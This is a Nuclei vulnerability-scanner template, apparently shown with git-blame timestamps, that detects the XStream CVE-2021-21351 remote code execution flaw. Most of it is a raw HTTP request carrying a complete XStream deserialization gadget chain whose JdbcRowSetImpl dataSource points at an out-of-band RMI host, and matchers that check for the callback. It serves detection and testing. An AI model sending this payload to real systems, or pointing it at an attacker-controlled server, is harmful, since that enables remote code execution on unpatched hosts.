nuclei-templates/http/cves/2021/CVE-2021-21351.yaml

136 lines
5.7 KiB
YAML
Raw Normal View History

2023-03-12 03:38:05 +00:00
id: CVE-2021-21351
info:
name: XStream <1.4.16 - Remote Code Execution
2023-03-12 03:38:05 +00:00
author: pwnhxl
severity: critical
2023-03-23 11:21:46 +00:00
description: |
XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
2023-09-06 12:09:01 +00:00
remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.
2023-03-12 03:38:05 +00:00
reference:
- https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351
- https://x-stream.github.io/CVE-2021-21351.html
- https://paper.seebug.org/1543/
- http://x-stream.github.io/changes.html#1.4.16
- https://nvd.nist.gov/vuln/detail/CVE-2021-21351
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2021-21351
2023-07-11 19:49:27 +00:00
cwe-id: CWE-434
epss-score: 0.73239
epss-percentile: 0.97833
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: xstream_project
product: xstream
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project
2023-03-12 03:38:05 +00:00
http:
2023-03-12 03:38:05 +00:00
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
<m__DTMXRTreeFrag>
<m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
<m__size>-10086</m__size>
<m__mgrDefault>
<__overrideDefaultParser>false</__overrideDefaultParser>
<m__incremental>false</m__incremental>
<m__source__location>false</m__source__location>
<m__dtms>
<null/>
</m__dtms>
<m__defaultHandler/>
</m__mgrDefault>
<m__shouldStripWS>false</m__shouldStripWS>
<m__indexing>false</m__indexing>
<m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
<fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
<javax.sql.rowset.BaseRowSet>
<default>
<concurrency>1008</concurrency>
<escapeProcessing>true</escapeProcessing>
<fetchDir>1000</fetchDir>
<fetchSize>0</fetchSize>
<isolation>2</isolation>
<maxFieldSize>0</maxFieldSize>
<maxRows>0</maxRows>
<queryTimeout>0</queryTimeout>
<readOnly>true</readOnly>
<rowSetType>1004</rowSetType>
<showDeleted>false</showDeleted>
<dataSource>rmi://{{interactsh-url}}/test</dataSource>
<listeners/>
<params/>
</default>
</javax.sql.rowset.BaseRowSet>
<com.sun.rowset.JdbcRowSetImpl>
<default/>
</com.sun.rowset.JdbcRowSetImpl>
</fPullParserConfig>
<fConfigSetInput>
<class>com.sun.rowset.JdbcRowSetImpl</class>
<name>setAutoCommit</name>
<parameter-types>
<class>boolean</class>
</parameter-types>
</fConfigSetInput>
<fConfigParse reference='../fConfigSetInput'/>
<fParseInProgress>false</fParseInProgress>
</m__incrementalSAXSource>
<m__walker>
<nextIsRaw>false</nextIsRaw>
</m__walker>
<m__endDocumentOccured>false</m__endDocumentOccured>
<m__idAttributes/>
<m__textPendingStart>-1</m__textPendingStart>
<m__useSourceLocationProperty>false</m__useSourceLocationProperty>
<m__pastFirstElement>false</m__pastFirstElement>
</m__dtm>
<m__dtmIdentity>1</m__dtmIdentity>
</m__DTMXRTreeFrag>
<m__dtmRoot>1</m__dtmRoot>
<m__allowRelease>false</m__allowRelease>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
2023-03-22 09:34:01 +00:00
2023-03-23 11:21:46 +00:00
- type: word
part: body
words:
- "timestamp"
2023-04-05 00:47:42 +00:00
- "com.thoughtworks.xstream"
condition: or
2023-03-23 11:21:46 +00:00
- type: word
part: header
words:
- "application/json"
2023-03-22 09:34:01 +00:00
- type: status
status:
2023-03-24 16:22:14 +00:00
- 500
# digest: 4a0a00473045022100a389afcb1aa0196810c2a43284cff93444aa5432a9d2e9002e5a3551a4d2cc36022020d5ab28a148364add94a54194b87436ca6e3f61ab503ceb40547a25d8084d46:922c64590222798bb761d5b6d8e72950